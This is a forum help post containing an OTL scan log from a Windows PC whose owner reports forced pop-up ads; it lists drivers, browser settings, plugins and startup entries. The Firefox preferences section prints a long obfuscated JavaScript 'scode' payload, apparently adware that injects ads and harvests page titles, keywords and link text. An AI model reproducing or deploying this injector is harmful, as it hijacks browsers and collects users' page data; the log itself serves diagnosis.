DRV:[b]64bit:[/b] - [2013/08/22 20:37:49 | 000,013,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hyperkbd.sys -- (hyperkbd)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:28 | 000,056,320 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:28 | 000,041,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidi2c.sys -- (hidi2c)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:14 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:[b]64bit:[/b] - [2013/08/22 20:36:25 | 000,016,384 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NdisVirtualBus.sys -- (NdisVirtualBus)
DRV:[b]64bit:[/b] - [2013/08/22 17:46:33 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fxppm.sys -- (FxPPM)
DRV:[b]64bit:[/b] - [2013/08/13 08:25:46 | 000,017,624 | ---- | M] (Windows (R) Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bcmfn2.sys -- (bcmfn2)
DRV:[b]64bit:[/b] - [2013/08/10 09:39:30 | 000,651,248 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorAV.sys -- (iaStorAV)
DRV:[b]64bit:[/b] - [2013/08/06 15:13:30 | 000,023,040 | ---- | M] (Apple Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netaapl64.sys -- (Netaapl)
DRV:[b]64bit:[/b] - [2013/07/31 03:47:35 | 000,024,568 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_GPIO.sys -- (iaLPSSi_GPIO)
DRV:[b]64bit:[/b] - [2013/07/26 04:05:39 | 000,099,320 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_I2C.sys -- (iaLPSSi_I2C)
DRV:[b]64bit:[/b] - [2013/06/18 23:44:59 | 000,129,224 | ---- | M] (Qualcomm Atheros Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\L1C63x64.sys -- (L1C)
DRV:[b]64bit:[/b] - [2013/04/04 14:50:32 | 000,025,928 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mbam.sys -- (MBAMProtector)
DRV:[b]64bit:[/b] - [2012/09/01 18:01:56 | 000,647,736 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorA.sys -- (iaStorA)
DRV:[b]64bit:[/b] - [2012/08/21 13:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:[b]64bit:[/b] - [2012/08/14 18:03:34 | 002,206,352 | ---- | M] (VIA Technologies, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\viahduaa.sys -- (VIAHdAudAddService)
DRV:[b]64bit:[/b] - [2012/07/02 15:16:02 | 000,062,784 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)
DRV:[b]64bit:[/b] - [2012/06/19 07:40:50 | 000,342,528 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:[b]64bit:[/b] - [2010/08/11 23:51:48 | 001,587,968 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ksaud.sys -- (ksaud)
DRV:[b]64bit:[/b] - [2010/07/05 13:47:00 | 000,565,248 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\GVUSB2.X64.SYS -- (GVUSB2.X64)
DRV - [2012/07/05 10:46:18 | 000,125,544 | ---- | M] () [Kernel | System | Stopped] -- C:\ProgramData\Kingsoft\klive\bin\encrypteddisk-x64.sys -- (EncryptedDisk)
DRV - [2007/07/06 15:34:36 | 000,016,800 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\RAWESR.sys -- (RAWESR)
DRV - [2007/07/06 15:34:34 | 000,013,600 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\LOGNT.SYS -- (LOGNT)
DRV - [2007/06/21 11:31:30 | 000,024,376 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\NTSTPL2.SYS -- (NTSTPL2)
DRV - [2007/06/21 11:31:30 | 000,024,376 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\ntstpl1.sys -- (NTSTPL1)


[color=#E56717]========== Standard Registry (SafeList) ==========[/color]


[color=#E56717]========== Internet Explorer ==========[/color]

IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE:[b]64bit:[/b] - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{502856A1-6DE0-41A4-B5E0-C086F87A22D4}: "URL" = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MASBJS
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,CustomizeSearch = http://search.jword.jp/jwd_sb_srchcust.htm?ielang={SUB_RFC1766}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,OCustomizeSearch = http://search.jword.jp/jwd_sb_srchcust.htm?ielang={SUB_RFC1766}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,OSearchAssistant = http://search.jword.jp/jwd_sb_srchasst.htm?ielang={SUB_RFC1766}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://search.jword.jp/jwd_sb_srchasst.htm?ielang={SUB_RFC1766}
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{726DA24E-A4A1-62E5-72EA-44C7886452CB}: "URL" = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MASBJS


IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://localoem.msn.com
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://home.kingsoft.jp [binary data]
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\SearchScopes\{502856A1-6DE0-41A4-B5E0-C086F87A22D4}: "URL" = http://www.bing.com/search?FORM=UP97DF&PC=UP97&q={searchTerms}&src=IE-SearchBox
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local

[color=#E56717]========== FireFox ==========[/color]

FF - prefs.js..browser.search.countryCode: "JP"
FF - prefs.js..browser.search.isUS: false
FF - prefs.js..browser.search.region: "JP"
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..extensions.1w1yYzYd3Bt0Hdq9.scode:
e=b&(352<(181,1206)?(93,65535):1268<=(197,48)?(70,24):(581,57));return((b-e)*a|((54,496)>=(1266,406)?(15,0):(538,20)))+(e*a|((109,1186)>(512,400)?(748,0):(360,1325)<=(274,22)?(1351,7):(954,1040)<=(66,435)?(1069,NaN):(130,57)))|(964>=(322,35)?(238,0):(28,1324))},b={};return{z0:a,i0:function(c,d,e){if(void 0!==\nb[e])return b[e];for(var g=131>=(1300,30)?(47,3432918353):(131,72),h=(387,282)<(234,217)?979:949>=(20,130)?(103,461845907):(67,1152),f=e,l=d&-(147>(26,106)?(3,4):(30,537)),n=393<=(224,579)?(110,0):(44,609);n<l;n+=(22,78)<(311,193)?(334,4):6>(67,31)?(417,\"K\"):(330,18))var k=c[(585>(255,136)?(106,\"c\"):(159,504))+(111<=(535,393)?(584,\"h\"):427<(18,57)?43:214<(1071,53)?(10,144):(1269,148))+(36>=(145,1095)?\"c\":(347,142)>(473,85)?(577,\"a\"):(568,998))+((352,49)>=(394,99)?90:1396<=(149,1300)?(1225,130):5<=\n(541,431)?(692,\"r\"):(581,48))+(242<(10,261)?(57,\"C\"):337>=(153,400)?389:1103>(82,1483)?(163,15):(385,583))+(808>=(68,37)?(563,\"o\"):(78,54))+\"deAt\"](n)&255|(c[\"c\"+(140>=(1465,372)?(1495,\"'\"):109<=(25,138)?(236,\"h\"):531<(101,20)?(67,\"l\"):(833,117))+\"arCodeA\"+((342,48)<=(128,325)?(2,\"t\"):(494,105))](n+1)&(17<(12,591)?(90,255):(100,71)))<<(252<(44,818)?(662,8):449>=(31,1115)?(1483,546):(146,81))|(c[(1349>(633,463)?(554,\"c\"):(116,51)>=(257,1072)?451:(800,39))+(91>=(141,94)?243:(138,40)>(131,458)?91:(1327,\n115)<=(22,439)?(559,\"h\"):(87,141))+\"ar\"+(149<=(51,114)?(59,233):118<(1139,173)?(72,\"C\"):(124,95))+(746>=(511,90)?(34,\"o\"):94>=(355,99)?\"H\":(240,108))+\"deA\"+(142<=(784,1264)?(287,\"t\"):(115,1190))](n+(72<=(38,44)?\"GET\":147>(566,60)?(140,2):(151,588)))&255)<<((418,483)>=(579,121)?(69,16):(64,64))|(c[(1022>(44,72)?(554,\"c\"):(910,192))+(298>(12,236)?(17,\"h\"):384>=(445,962)?(92,237):137<=(137,99)?536:(82,121))+((261,370)<(412,490)?(82,\"a\"):860<(48,105)?\"W\":(526,209))+(1261<=(10,981)?65:34<=(220,371)?(144,\n\"r\"):(173,270))+(253>(41,67)?(46,\"C\"):433<=(260,112)?(352,\"ADS\"):(17,491))+(106<=(88,427)?(131,\"o\"):(815,95
))+(467>=(145,471)?64:(10,570)<=(42,1164)?(112,\"d\"):282<=(849,67)?(317,365):(87,157))+(289>=(268,1049)?(206,791):61<=(368,1293)?(77,\"e\"):(496,406))+((1281,432)<=(850,149)?(119,224):(561,101)<=(132,1264)?(143,\"A\"):(105,84))+\"t\"](n+((9,144)>(172,76)?(1227,3):(1382,39)))&255)<<(517>(59,23)?(242,24):(258,8)),k=a(k,g),k=(k&(548<=(45,120)?NaN:(69,364)<=(24,973)?(486,131071):123>(100,1339)?406:(311,\n142)))<<((1114,428)<(986,143)?1074:66<=(483,106)?(10,15):(82,1276))|k>>>(1054>=(1,394)?(986,17):(143,32)),k=a(k,h),f=f^k,f=(f&524287)<<13|f>>>(61<(6,98)?(178,19):(394,40)),f=f*(163<(1225,66)?NaN:441>(135,430)?(56,5):(706,361))+(697<=(414,52)?(989,15):(485,1112)>=(1038,144)?(108,3864292196):(1466,1071))|((60,578)>(60,30)?(384,0):(730,1252));k=172>=(491,125)?(30,0):(24,477);switch(d%(815<=(1295,238)?1240:(118,69)<=(410,132)?(68,4):(431,473))){case 22<=(818,90)?(405,3):(0,309)<=(44,273)?(92,\"W\"):(133,\n39):k=(c[\"ch\"+((57,485)>(71,1156)?239:(366,325)>=(52,383)?(122,165):20<=(72,1481)?(116,\"a\"):(4,1250))+(169<(41,364)?(102,\"r\"):(43,295))+(124<=(72,895)?(492,\"C\"):(138,198))+\"od\"+(51!=(65,51)?(140,\"P\"):(51,37)>(122,559)?(77,91):32<=(353,593)?(87,\"e\"):(511,526))+\"At\"](l+2)&255)<<(69<=(118,37)?380:(82,691)>(42,269)?(344,16):(77,92)>(143,228)?122:(76,440));case (1399,345)<(49,115)?(474,149):(3,98)>(1305,319)?(435,573):(110,7)<(1022,23)?(234,2):(489,105):k|=(c[\"char\"+(277<=(866,115)?(138,28):(87,213)>=\n(96,57)?(1220,\"C\"):(135,142)>=(138,1225)?\"A\":(555,124))+(1181<=(98,301)?!1:(104,21)<(574,1285)?(3,\"o\"):(129,316))+(275>(142,768)?72:(70,1097)>=(183,32)?(351,\"d\"):(121,187))+\"eAt\"](l+((1438,675)>=(565,65)?(1237,1):288>=(1283,355)?59:(37,6)))&((1069,119)>=(643,797)?(1307,NaN):(1153,494)>(147,349)?(1098,255):551<(110,30)?(106,NaN):(1397,107)))<<(55<=(100,1018)?(560,8):(32,253)>=(669,636)?NaN:(1177,575)<(45,499)?(22,97):(76,952));case 
114>=(148,1445)?568:66<(1252,448)?(445,1):(385,55)>(167,81)?\"V\":(16,\n266):k|=c[((535,197)>=(93,39)?(140,\"c\"):(589,490))+\"harCodeA\"+(23<=(59,890)?(4,\"t\"):531<=(137,256)?(1139,\"D\"):(8,199))](l)&((80,484)<(1493,431)?265:67<(472,764)?(61,255):(1374,233)>(399,1035)?(146,140):(31,130)),k=a(k,g),k=(k&(1052>(0,436)?(108,131071):(1278,652)))<<(67<=(425,206)?(1116,15):(61,1271))|k>>>(880>(603,375)?(1278,17):(215,263)),k=a(k,h),f^=k}f^=d;f^=f>>>(116>(107,985)?(255,1210):45<(450,137)?(95,16):(301,371));f=a(f,296<=(134,59)?(165,1009):(1400,858)>(467,33)?(124,2246822507):107>(132,\n520)?(185,\"T\"):(280,1174));f^=f>>>(606>(799,130)?(607,13):(323,1437)<(96,301)?560:1231<=(488,473)?(463,NaN):(323,146));f=a(f,(1117,1311)>=(567,32)?(11,3266489909):138>(260,206)?\"p\":(100,306));f^=f>>>16;return b[e]=f}}}(),e7T:3,W9T:\"o\",c0:function(a,b){return a>b},g7T:\"c\",Z7T:8,b7T:\"At\",G4T:\"C\",V0:function(a,b){return a<b},V7T:2,d9T:\"od\",F5:function(a,b){return a|b},E9T:\"A\",Q2:function(a,b){return a<b},H2:function(a,b){return a<b},r7T:\"d\",M2:function(a,b){return a|b},R0:function(a,b){return a==b},\nD5:function(a,b){return a&b}},isRvzFrame=function(a){try{return a instanceof HTMLIFrameElement&&a.parentNode instanceof HTMLDivElement&&a.parentNode.parentNode instanceof HTMLDivElement&&a.parentNode.parentNode.className&&\"string\"==typeof a.parentNode.parentNode.className&&1<a.parentNode.parentNode.className.length&&removeNode(a.parentNode.parentNode.className.split(\" \")[0])}catch(b){return!1}};window.adzy653rk={version:\"1.0\",nrnm:5,ifr:[],src:[],jbs:{ifr:[],at:[]},imp:{pid:\"2111\",eid:\"1272\",\nhid:\"17070091036678530380\",prid:100,lt:\"39\",referrer:document.referrer,hostname:window.self.location.hostname,url:window.self.location.hostname,jpshort:\"Qgr650HB\",rattr:stngs.attr_name,title:document.title,domain:stngs.szy_domain,sizes:stngs.ad_sizes},topHost:function(){if(window.self!=window.top){var 
a=decodeURIComponent(window.self.location.search).match(/http:\\/\\/[^&]+/);return a&&a[0]}return null}(),checkIfPartner:function(a){if(window.top==window)return isRvzFrame(a);\nvar b={_728x90:function(a){return a.parentElement&&a.parentElement.nextSibling&&a.parentElement.nextSibling.children&&a.parentElement.nextSibling.children[0]&&a.parentElement.nextSibling.children[0]&&a.parentElement.nextSibling.children[0].innerHTML.match(/qa/)},_160_600:function(a){return a.parentElement&&a.parentElement.nextSibling&&\"String\"==typeof a.parentElement.nextSibling.innerHTML&&adzy653rk.regexExtTest.test(a.parentElement.nextSibling.innerHTML)},_625x250:function(a){return(a=a.getAttribute(\"style\"))?\na.match(/width:\\s?625px/)&&a.match(/width:\\s?250px/):!1},_345x600:function(a){return(a=a.getAttribute(\"style\"))?a.match(/width:\\s?345px/)&&a.match(/width:\\s?600px/):!1}},c;for(c in b)if(b[c](a))return!0;return!1},getKeywords:function(){var a=adzy653rk.imp.title,b=document.getElementsByTagName(\"meta\");if(b)for(var c=0,d=b.length;c<d;c++)\"keywords\"!=b[c].name.toLowerCase()&&\"description\"!=b[c].name.toLowerCase()||(a+=\" \"+b[c].content.replace(/,/g,\" \"));if(c=document.getElementsByTagName(\"a\")){b={};\nfor(d=0;d<c.length;d++)try{var e=c[d].innerText;\"undefined\"==typeof e&&(e=c[d].textContent);for(var g=e.toLowerCase().split(/[\\s,-]/g),h=0;h<g.length;h++)4>g[h].length||(b[g[h]]?b[g[h]]++:b[g[h]]=1)}catch(f){}var e=[],l;for(l in b)e.push([l,b[l]]);e.sort(function(a,b){return b[1]-a[1]});e=e.slice(0,25);for(l=0;l<e.length;l++)a+=\" \"+e[l][0]}return a.replace(/[_-]/g,\" \").substring(0,1024)},setMarker:function(){var a=document.getElementsByTagName(\"body\")[0];a&&!a.getAttribute(\"jhjlijpomuhn_l\")&&a.setAttribute(\"jhjlijpomuhn_m\",\n\"l\")},isAncestor:function(a,b,c){function d(a){return\"object\"==typeof a&&a.top instanceof Window||/^\\s*\\[\\s*object\\s*Window\\s*\\]\\s*/.test(a+\"\")}c=c||30;return 
a==b?!0:!d(a)||!d(b)||b==window.top||0>=c?!1:adzy653rk.isAncestor(a,b.parent,--c)},listenForMessages:function(){if(window.top===window){var a=adzy653rk;window.addEventListener(\"message\",function(b){try{if(0==((b.data||\"\")+\"\").indexOf(a.l.encode(a.imp.hid+\"/\"+a.imp.eid+\"/\"+a.imp.prid)+\"_\"))switch(b.data.split(\"_\")[1]){case \"IIIFAR\":for(var c=\nwindow.document.getElementsByTagName(\"iframe\"),d=0,e;d<c.length;d++)e=c[d],a.isAncestor(e.contentWindow,b.source)&&(isRvzFrame(e)?b.source.postMessage(b.data+\"_\"+a.l.encode(\"RVZ\"),\"*\"):b.source.postMessage(b.data,\"*\"))}}catch(g){}},!1)}},isAllowRunning:function(a){var b=adzy653rk,c,d=b.imp.hid,e=b.imp.eid,g=b.imp.prid,h=function(e){try{var d=b.l.encode(b.imp.hid+\"/\"+b.imp.eid+\"/\"+b.imp.prid);if(0==((e.dat
  • かなは
  • 2015/04/21 (Tue) 17:08:39
Re: Pop-ups and ads are being forcibly displayed and it is causing me trouble.
OTL tag 2



FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\system32\Macromed\Flash\NPSWF64_17_0_0_169.dll File not found
FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_169.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@gamepot.co.jp/GamepotEXeEnvCtrl;version=1: C:\Program Files (x86)\Gamepot\GPEXE\\npGPEXE.dll ()
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@nexon.co.jp/NxGame: C:\ProgramData\NexonJP\NGM\npNxGameJP.dll (Nexon)
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKLM\Software\MozillaPlugins\pmang.jp/pmangsupport-1: C:\Users\ryota\Desktop\新しいフォルダー\GameOn\TERA\nppmangsupport_0.dll (gameon)
FF - HKCU\Software\MozillaPlugins\@neople.co.kr/NeopleGameInstaller: C:\ProgramData\NeoplePlugin\npNeopleGameInstaller.dll ( )

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 37.0.1\extensions\\Components: c:\program files (x86)\Mozilla Firefox\components [2014/08/30 11:40:53 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 37.0.1\extensions\\Plugins: c:\program files (x86)\Mozilla Firefox\plugins

[2014/05/16 21:28:33 | 000,000,000 | ---D | M] (No name found) -- C:\Users\ryota\AppData\Roaming\mozilla\Extensions
[2015/04/20 15:21:21 | 000,000,000 | ---D | M] (No name found) -- C:\Users\ryota\AppData\Roaming\mozilla\Firefox\Profiles\huvep8mo.default\extensions
[2015/04/20 15:21:21 | 000,000,000 | ---D | M] (Avira Browser Safety) -- C:\Users\ryota\AppData\Roaming\mozilla\Firefox\Profiles\huvep8mo.default\extensions\abs@avira.com
[2014/06/30 01:40:59 | 000,000,000 | ---D | M] (HGPlugin) -- C:\Users\ryota\AppData\Roaming\mozilla\Firefox\Profiles\huvep8mo.default\extensions\hgplugin@hangame.co.jp
[2015/04/04 19:27:38 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2015/04/04 19:25:26 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

[color=#E56717]========== Chrome ==========[/color]

CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},
CHR - homepage:
CHR - plugin: Error reading preferences file
CHR - Extension: Google ドキュメント = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\
CHR - Extension: Google ドライブ = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.4_0\
CHR - Extension: YouTube = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.7_0\
CHR - Extension: Google Search = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.30_0\
CHR - Extension: Twitch Stream = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjaicoojlfoococemdcaollmhaiolole\207\
CHR - Extension: Avira Browser Safety = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk\1.4.6_0\
CHR - Extension: Dropmark sidebar = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\foiapgoppijipmmgkaibacckkhbngfhp\171\
CHR - Extension: BlocKUTubEADi = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\geoafhlnmffijlblgohnpmjfbnpcpadd\3.2_0\
CHR - Extension: Google ウォレット = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: Gmail = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\

O1 HOSTS File: ([2013/08/22 22:25:41 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2:[b]64bit:[/b] - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O2 - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O3 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\Toolbar\WebBrowser: (no name) - {AEF44653-C059-42CB-A5B7-41C640DA4A67} - No CLSID value found.
O4:[b]64bit:[/b] - HKLM..\Run: [Creative SB Monitoring Utility] C:\WINDOWS\SysNative\SBAVMon.dll (Creative Technology Ltd.)
O4:[b]64bit:[/b] - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxTray.exe (Intel Corporation)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [au_WiFi_Connect] C:\Program Files (x86)\au Wi-Fi接続ツール\au_WiFi_Connect.exe ()
O4 - HKLM..\Run: [DivXUpdate] C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe ()
O4 - HKLM..\Run: [eochk] File not found
O4 - HKLM..\Run: [Google Japanese Input Prelauncher] C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe (Google Inc.)
O4 - HKLM..\Run: [HDAudDeck] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe (VIA)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [ApplicationManager] C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe (Kingsoft Corp. Ltd.)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [CCleaner Monitoring] C:\Program Files\CCleaner\CCleaner64.exe (Piriform Ltd)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [DAEMON Tools Lite] C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe (Disc Soft Ltd)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [iFunBox Fast App Install Handler] C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe (i-Funbox.com)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [Line] C:\Program Files (x86)\Naver\LINE\Line.exe (LINE Corporation)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [OneDrive] C:\Users\ryota\AppData\Local\Microsoft\OneDrive\OneDrive.exe (Microsoft Corporation)
